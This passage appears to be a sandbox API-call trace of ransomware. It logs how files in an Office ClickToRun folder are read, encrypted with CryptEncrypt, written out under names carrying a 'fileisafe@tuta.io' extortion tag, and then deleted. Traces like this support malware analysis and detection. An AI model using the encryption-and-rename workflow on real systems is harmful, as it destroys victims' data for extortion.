lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x1028, lpOverlapped=0x0) returned 1 [0145.440] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x1030, dwBufLen=0x1030 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x1030) returned 1 [0145.440] WriteFile (in: hFile=0x2d8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x1030, lpOverlapped=0x0) returned 1 [0145.441] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3070) returned 1 [0145.441] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0145.441] CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0145.441] CryptDestroyKey (hKey=0xac3070) returned 1 [0145.441] WriteFile (in: hFile=0x2d8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0145.442] CryptDestroyKey (hKey=0xac2df0) returned 1 [0145.442] CloseHandle (hObject=0x2f0) returned 1 [0145.442] CloseHandle (hObject=0x2d8) returned 1 [0145.442] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml")) returned 1 [0145.443] SetEvent (hEvent=0x288) returned 1 [0145.443] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0145.443] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0145.483] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=358616) returned 1 [0145.483] CloseHandle (hObject=0x2d8) returned 1 [0145.484] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe")) returned 0x20 [0145.484] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0145.484] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0145.484] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0145.484] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0145.484] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0145.484] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3170) returned 1 [0145.484] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0145.484] ReadFile (in: hFile=0x2d8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x578d8, lpOverlapped=0x0) returned 1 [0145.494] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x578e0, dwBufLen=0x578e0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x578e0) returned 1 [0145.494] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x578e0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x578e0, lpOverlapped=0x0) returned 1 [0145.502] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac32f0) returned 1 [0145.502] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0145.502] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0145.502] CryptDestroyKey (hKey=0xac32f0) returned 1 [0145.502] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0145.502] CryptDestroyKey (hKey=0xac3170) returned 1 [0145.502] CloseHandle (hObject=0x2d8) returned 1 [0145.502] CloseHandle (hObject=0x2f0) returned 1 [0145.502] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe")) returned 1 [0145.506] SetEvent (hEvent=0x288) returned 1 [0145.506] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0145.506] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0145.506] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=3144288) returned 1 [0145.506] CloseHandle (hObject=0x2f0) returned 1 [0145.506] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll")) returned 0x20 [0145.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0145.507] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll")) returned 1 [0145.508] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0145.508] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0145.508] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=4677216) returned 1 [0145.508] CloseHandle (hObject=0x2f0) returned 1 [0145.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll")) returned 0x20 [0145.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0145.509] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll")) returned 1 [0145.509] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0145.509] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0145.509] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=3177152) returned 1 [0145.509] CloseHandle (hObject=0x2f0) returned 1 [0145.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll")) returned 0x20 [0145.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0145.510] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll")) returned 1 [0145.511] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0145.511] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0145.511] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=9330784) returned 1 [0145.511] CloseHandle (hObject=0x2f0) returned 1 [0145.511] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll")) returned 0x20 [0145.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0145.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll")) returned 1 [0145.512] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0145.513] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0145.513] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=61024) returned 1 [0145.513] CloseHandle (hObject=0x2f0) returned 1 [0145.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll")) returned 0x20 [0145.513] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0145.513] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0145.513] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0145.513] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0145.513] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0145.514] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2df0) returned 1 [0145.514] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0145.514] ReadFile (in: hFile=0x2f0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xee60, lpOverlapped=0x0) returned 1 [0145.735] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xee70, dwBufLen=0xee70 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xee70) returned 1 [0145.735] WriteFile (in: hFile=0x2d8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xee70, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xee70, lpOverlapped=0x0) returned 1 [0145.737] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3270) returned 1 [0145.737] CryptSetKeyParam (hKey=0xac3270, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0145.737] CryptEncrypt (in: hKey=0xac3270, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0145.737] CryptDestroyKey (hKey=0xac3270) returned 1 [0145.737] WriteFile (in: hFile=0x2d8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0145.737] CryptDestroyKey (hKey=0xac2df0) returned 1 [0145.737] CloseHandle (hObject=0x2f0) returned 1 [0145.737] CloseHandle (hObject=0x2d8) returned 1 [0145.738] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll")) returned 1 [0145.739] SetEvent (hEvent=0x288) returned 1 [0145.739] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0145.739] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0145.739] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=660136) returned 1 [0145.739] CloseHandle (hObject=0x2d8) returned 1 [0145.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll")) returned 0x20 [0145.739] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0145.739] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.740] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0145.740] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0145.740] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=635040) returned 1 [0145.740] CloseHandle (hObject=0x2d8) returned 1 [0145.740] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll")) returned 0x20 [0145.740] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0145.740] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.740] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0145.740] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0145.741] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=963240) returned 1 [0145.741] CloseHandle (hObject=0x2d8) returned 1 [0145.741] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll")) returned 0x20 [0145.741] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0145.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0145.741] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0145.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0145.742] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=5967976) returned 1 [0145.742] CloseHandle (hObject=0x2ec) returned 1 [0145.742] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe")) returned 0x20 [0145.742] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common 